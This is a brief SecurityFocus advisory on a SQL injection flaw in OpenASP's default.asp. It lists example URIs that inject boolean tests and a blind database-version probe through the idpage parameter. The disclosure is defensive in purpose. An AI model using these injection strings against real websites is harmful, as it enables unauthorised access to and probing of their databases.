OpenASP 'default.asp' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URIs are available:

http://www.example.com/default.asp?modulo=pages&idpage=1 or 1=1 (true)
http://www.example.com/default.asp?modulo=pages&idpage=1 or 1=2 (false)
http://www.example.com/default.asp?modulo=pages&idpage=-1 and substring(@@version,1,1)=4/*


 

Privacy Statement
Copyright 2010, SecurityFocus